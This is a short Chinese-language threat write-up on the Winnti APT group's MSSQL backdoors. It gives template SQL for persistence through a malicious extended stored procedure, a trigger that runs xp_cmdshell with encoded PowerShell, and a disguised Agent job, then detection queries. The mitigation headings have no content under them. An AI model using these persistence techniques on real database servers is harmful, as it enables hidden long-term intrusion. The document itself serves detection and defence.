Winnti是一个长期活跃的APT组织,主要针对游戏、软件和高科技公司进行攻击。他们开发的MSSQL后门是一种隐蔽的持久化工具,允许攻击者在受感染的SQL服务器上保持长期访问权限。
Winnti常使用自定义的扩展存储过程(xp)作为后门:
-- 创建恶意DLL
sp_addextendedproc 'xp_winnti_backdoor', 'C:\temp\malicious.dll'
-- 调用后门
EXEC xp_winnti_backdoor 'command'
在特定表上创建触发器,在数据操作时执行恶意代码:
CREATE TRIGGER backdoor_trigger
ON dbo.important_table
FOR INSERT, UPDATE, DELETE
AS
EXECUTE('xp_cmdshell ''powershell -enc <encoded_command>''')
创建SQL Server Agent作业定期执行恶意命令:
USE msdb
EXEC dbo.sp_add_job @job_name = 'System_Update'
EXEC sp_add_jobstep @job_name = 'System_Update',
@step_name = 'Step1',
@subsystem = 'PowerShell',
@command = 'malicious_script.ps1'
EXEC dbo.sp_add_jobserver @job_name = 'System_Update'
SELECT * FROM sys.objects WHERE type_desc = 'SQL_EXTENDED_PROCEDURE'
SELECT name, parent_id, create_date, modify_date
FROM sys.triggers
ORDER BY create_date DESC
SELECT * FROM msdb.dbo.sysjobs
WHERE date_created > DATEADD(month, -3, GETDATE())
SELECT * FROM sys.server_principals
WHERE type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN')
AND is_disabled = 0
权限最小化:
审计与监控:
补丁管理:
网络隔离:
文件完整性监控:
Winnti组织的后门通常设计得非常隐蔽,建议企业结合EDR解决方案和专业的威胁狩猎团队进行深度检测。